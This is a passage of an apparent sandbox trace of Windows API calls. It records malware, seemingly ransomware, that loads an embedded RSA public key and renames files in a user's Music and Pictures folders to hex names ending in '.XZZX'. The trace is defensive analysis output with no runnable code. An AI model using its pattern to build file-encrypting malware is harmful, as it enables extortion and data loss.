9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B02B14800A31A4C0C9DC8D360E528908.XZZX") returned 116 [0246.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0246.206] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\FF8E3598459F9F4441522C5A485A838C.XZZX") returned 116 [0246.206] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 987 os_tid = 0x1274 [0246.361] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.361] lstrcpyW (in: lpString1=0x2baf460, lpString2="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" | out: lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" [0246.361] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.361] SetErrorMode (uMode=0x1) returned 0x1 [0246.361] lstrcpyW (in: lpString1=0x2baf860, lpString2="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" | out: lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" [0246.361] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x72b1da82, Data2=0xaf4d, Data3=0x4995, Data4=([0]=0xa1, [1]=0x65, [2]=0xc7, [3]=0x85, [4]=0xda, [5]=0xc5, [6]=0x4, [7]=0x81))) returned 0x0 [0246.361] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned 116 [0246.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0246.362] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\13DD971A3262FCD172B1DA82351DE119.XZZX") returned 116 [0246.362] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 988 os_tid = 0x1278 [0246.518] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.518] lstrcpyW (in: lpString1=0x2baf460, lpString2="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" | out: lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" [0246.518] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0246.518] SetErrorMode (uMode=0x1) returned 0x1 [0246.518] lstrcpyW (in: lpString1=0x2baf860, lpString2="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" | out: lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" [0246.518] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x16776f4d, Data2=0x51de, Data3=0x4e28, Data4=([0]=0x92, [1]=0x4, [2]=0x8c, [3]=0xc0, [4]=0x30, [5]=0xa2, [6]=0xf2, [7]=0x5a))) returned 0x0 [0246.518] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned 116 [0246.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0246.518] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\45C9E1C618FE6EB016776F4D1BB952F8.XZZX") returned 116 [0246.519] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 989 os_tid = 0x127c [0246.681] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.681] lstrcpyW (in: lpString1=0x2baf460, lpString2="1698FA38038EB2CD51213BC807C39715.XZZX" | out: lpString1="1698FA38038EB2CD51213BC807C39715.XZZX") returned="1698FA38038EB2CD51213BC807C39715.XZZX" [0246.681] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.681] SetErrorMode (uMode=0x1) returned 0x1 [0246.681] lstrcpyW (in: lpString1=0x2baf860, lpString2="1698FA38038EB2CD51213BC807C39715.XZZX" | out: lpString1="1698FA38038EB2CD51213BC807C39715.XZZX") returned="1698FA38038EB2CD51213BC807C39715.XZZX" [0246.681] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x18be7041, Data2=0xe388, Data3=0x45b7, Data4=([0]=0x98, [1]=0x6a, [2]=0x1b, [3]=0x59, [4]=0x18, [5]=0x34, [6]=0xd3, [7]=0x4f))) returned 0x0 [0246.681] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1698FA38038EB2CD51213BC807C39715.XZZX") returned 80 [0246.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0246.681] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\02B545883DF64E3818BE704140B13280.XZZX") returned 80 [0246.681] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 990 os_tid = 0x1280 [0246.830] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.830] lstrcpyW (in: lpString1=0x2baf460, lpString2="1971D3BF09924C93CB17194F0DC730DB.XZZX" | out: lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX") returned="1971D3BF09924C93CB17194F0DC730DB.XZZX" [0246.830] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.830] SetErrorMode (uMode=0x1) returned 0x1 [0246.830] lstrcpyW (in: lpString1=0x2baf860, lpString2="1971D3BF09924C93CB17194F0DC730DB.XZZX" | out: lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX") returned="1971D3BF09924C93CB17194F0DC730DB.XZZX" [0246.830] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x797e8cb8, Data2=0xc441, Data3=0x4f14, Data4=([0]=0x9f, [1]=0xb5, [2]=0x75, [3]=0xf9, [4]=0x80, [5]=0x99, [6]=0x91, [7]=0x5c))) returned 0x0 [0246.830] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1971D3BF09924C93CB17194F0DC730DB.XZZX") returned 80 [0246.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0246.830] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BCDE9AB83C9F6414797E8CB83F5A485C.XZZX") returned 80 [0246.830] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 991 os_tid = 0x1284 [0246.985] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0246.985] lstrcpyW (in: lpString1=0x2baf460, lpString2="2187C5602F1ADAF08D4383D0333BBF38.XZZX" | out: lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned="2187C5602F1ADAF08D4383D0333BBF38.XZZX" [0246.985] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0246.986] SetErrorMode (uMode=0x1) returned 0x1 [0246.986] lstrcpyW (in: lpString1=0x2baf860, lpString2="2187C5602F1ADAF08D4383D0333BBF38.XZZX" | out: lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned="2187C5602F1ADAF08D4383D0333BBF38.XZZX" [0246.986] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x8cf26b8a, Data2=0x6efb, Data3=0x4030, Data4=([0]=0xb2, [1]=0xa6, [2]=0xa7, [3]=0x60, [4]=0x88, [5]=0x98, [6]=0x98, [7]=0x95))) returned 0x0 [0246.986] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned 80 [0246.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0246.986] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5BE4BC4E1BD38F108CF26B8A1E8E7358.XZZX") returned 80 [0246.986] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 992 os_tid = 0x1288 [0247.142] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.142] lstrcpyW (in: lpString1=0x2baf460, lpString2="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" | out: lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" [0247.142] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.142] SetErrorMode (uMode=0x1) returned 0x1 [0247.142] lstrcpyW (in: lpString1=0x2baf860, lpString2="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" | out: lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" [0247.142] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x30bf47c, Data2=0x15db, Data3=0x4cc7, Data4=([0]=0xaf, [1]=0xb0, [2]=0xb, [3]=0x58, [4]=0xf2, [5]=0xfc, [6]=0xf2, [7]=0xf))) returned 0x0 [0247.142] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned 80 [0247.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0247.142] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\96485214068E013D030BF47C0948E585.XZZX") returned 80 [0247.142] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 993 os_tid = 0x1290 [0247.298] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.298] lstrcpyW (in: lpString1=0x2baf460, lpString2="4EC1B3383CF01EB849835EF241110300.XZZX" | out: lpString1="4EC1B3383CF01EB849835EF241110300.XZZX") returned="4EC1B3383CF01EB849835EF241110300.XZZX" [0247.298] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.298] SetErrorMode (uMode=0x1) returned 0x1 [0247.298] lstrcpyW (in: lpString1=0x2baf860, lpString2="4EC1B3383CF01EB849835EF241110300.XZZX" | out: lpString1="4EC1B3383CF01EB849835EF241110300.XZZX") returned="4EC1B3383CF01EB849835EF241110300.XZZX" [0247.298] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xbb9a674e, Data2=0x7c3d, Data3=0x464d, Data4=([0]=0xb4, [1]=0x47, [2]=0xb7, [3]=0x7a, [4]=0xf0, [5]=0x44, [6]=0xae, [7]=0xfd))) returned 0x0 [0247.298] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4EC1B3383CF01EB849835EF241110300.XZZX") returned 80 [0247.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0247.298] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7DD46596221E0C59BB9A674E24D8F0A1.XZZX") returned 80 [0247.298] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 994 os_tid = 0x1298 [0247.453] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.453] lstrcpyW (in: lpString1=0x2baf460, lpString2="567FB4290F0A7CE338C9770B132B612B.XZZX" | out: lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX") returned="567FB4290F0A7CE338C9770B132B612B.XZZX" [0247.453] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.453] SetErrorMode (uMode=0x1) returned 0x1 [0247.453] lstrcpyW (in: lpString1=0x2baf860, lpString2="567FB4290F0A7CE338C9770B132B612B.XZZX" | out: lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX") returned="567FB4290F0A7CE338C9770B132B612B.XZZX" [0247.454] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xf2cf502f, Data2=0x634d, Data3=0x4de1, Data4=([0]=0x9f, [1]=0xf2, [2]=0x65, [3]=0x78, [4]=0x1c, [5]=0x7f, [6]=0x28, [7]=0xe))) returned 0x0 [0247.454] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\567FB4290F0A7CE338C9770B132B612B.XZZX") returned 80 [0247.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 